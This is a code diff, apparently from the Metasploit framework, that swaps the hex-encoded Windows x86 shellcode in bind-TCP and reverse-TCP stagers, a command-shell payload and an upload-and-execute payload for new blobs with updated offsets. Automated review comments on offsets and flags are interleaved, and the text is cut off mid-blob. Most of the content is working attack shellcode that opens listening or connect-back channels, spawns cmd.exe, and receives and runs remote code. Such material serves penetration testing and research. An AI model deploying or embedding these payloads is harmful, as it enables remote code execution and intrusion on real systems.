"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" +
|
||||
"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" +
|
||||
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" +
|
||||
"\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" +
|
||||
"\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" +
|
||||
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
|
||||
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" +
|
||||
"\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" +
|
||||
"\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +
|
||||
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +
|
||||
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +
|
||||
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +
|
||||
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +
|
||||
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +
|
||||
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Bind TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -32,34 +32,27 @@ module Metasploit3
|
||||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 276+1, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc"+
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" +
|
||||
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" +
|
||||
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" +
|
||||
"\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" +
|
||||
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +
|
||||
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +
|
||||
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" +
|
||||
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +
|
||||
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +
|
||||
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +
|
||||
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +
|
||||
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +
|
||||
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +
|
||||
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" +
|
||||
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" +
|
||||
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" +
|
||||
"\xff\xd3"
|
||||
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
|
||||
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
|
||||
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
|
||||
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
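Review bot: `'RequiresMidstager' => false` is the switch that makes `handle_intermediate_stage` in the Payload::Windows mixin send only the 4-byte length instead of the midstage, and nothing here says why this stager can opt out. A comment on the key, e.g. `# the blob's block_recv reads a 4-byte length prefix and receives the whole stage itself, so no midstage is needed`, would tie the flag to the blob it describes; that the new blob does this is inferred from stager_bind_tcp_nx.asm's include of block_recv.asm and the recv/VirtualAlloc/recv sequence at the end of the bytes, which this hunk does not show in source form. The Reverse TCP Stager hunk below runs past the end of the page, so whether it sets the same flag should be checked there.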
@ -100,5 +100,18 @@ module Metasploit3
|
||||
# Return the updated payload
|
||||
return p
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -32,32 +32,26 @@ module Metasploit3
|
||||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 263, 'ADDR' ],
|
||||
'LPORT' => [ 270, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" +
|
||||
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
|
||||
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" +
|
||||
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
|
||||
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" +
|
||||
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" +
|
||||
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" +
|
||||
"\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" +
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" +
|
||||
"\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" +
|
||||
"\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" +
|
||||
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" +
|
||||
"\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" +
|
||||
"\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" +
|
||||
"\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" +
|
||||
"\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" +
|
||||
"\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" +
|
||||
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" +
|
||||
"\x57\xff\x55\x18\xff\xd3"
|
||||
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
|
||||
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
|
||||
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
|
||||
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
|
||||
"\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
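Review bot: The inline `'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },` line carries two bare magic numbers with nothing tying them to the blob, and a stale offset after the blob is regenerated would silently patch the wrong dword without any error. Counting the 16-byte lines of the new `'Payload'`, byte 196 is the start of the `\x7F\x00\x00\x01` placeholder and byte 203 the start of `\x11\x5C`, so both values are correct for this blob. A comment such as `# byte offsets of the 127.0.0.1 / 4444 placeholders in the blob below; must be recomputed whenever 'Payload' is rebuilt` would make that coupling explicit. `'RequiresMidstager' => false` is also new and undocumented; one line saying what changes when it is true would help readers of the other stagers in this commit, which set the same key.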
@ -22,7 +22,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a piped command shell',
|
||||
'Author' => 'spoonm',
|
||||
'Author' => [ 'spoonm', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -35,39 +35,23 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 443, 'V' ]
|
||||
'EXITFUNC' => [ 210, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
|
||||
"\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
|
||||
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
|
||||
"\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
|
||||
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
|
||||
"\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
|
||||
"\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
|
||||
"\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
|
||||
"\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
|
||||
"\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
|
||||
"\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
|
||||
"\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
|
||||
"\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
|
||||
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
|
||||
"\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
|
||||
"\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
|
||||
"\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
|
||||
"\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
|
||||
"\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
|
||||
"\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
|
||||
"\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
|
||||
"\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
|
||||
"\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
|
||||
"\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
|
||||
"\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
|
||||
"\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
|
||||
"\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
|
||||
"\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
|
||||
"\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
|
||||
"\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
|
||||
"\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
|
||||
"\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
|
||||
"\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
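Review bot: `'EXITFUNC' => [ 210, 'V' ]` replaces the old 443 with no comment explaining what sits at the new offset or how it was derived. Counting the 16-byte lines of the new `'Payload'`, byte 210 is the dword `\xE0\x1D\x2A\x0A` that follows the `\xBB` ending the previous line, which looks like the imm32 of a `mov ebx` — so the offset is consistent with this blob, but that is exactly the kind of fact that should be written down. A comment like `# offset of the imm32 that selects the exit routine (mov ebx, <hash>); recompute on every rebuild of the blob` would do. The bytes `\x80\xFB\xE0\x75\x05` a little further on appear to test the low byte of that same dword, so whatever hash family replace_var writes there must keep that byte distinguishable — worth confirming against the assembler source the blob was generated from and noting next to the offset.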
@ -22,7 +22,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Upload/Execute',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Uploads an executable and runs it',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => ['vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -31,34 +31,33 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 385, 'V' ]
|
||||
'EXITFUNC' => [ 368, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
|
||||
"\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
|
||||
"\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
|
||||
"\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
|
||||
"\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
|
||||
"\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
|
||||
"\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
|
||||
"\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
|
||||
"\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
|
||||
"\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
|
||||
"\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
|
||||
"\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
|
||||
"\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
|
||||
"\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
|
||||
"\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
|
||||
"\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
|
||||
"\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
|
||||
"\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
|
||||
"\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
|
||||
"\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
|
||||
"\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
|
||||
"\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
|
||||
"\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
|
||||
"\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
|
||||
"\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
|
||||
"\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
|
||||
"\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
|
||||
"\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
|
||||
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
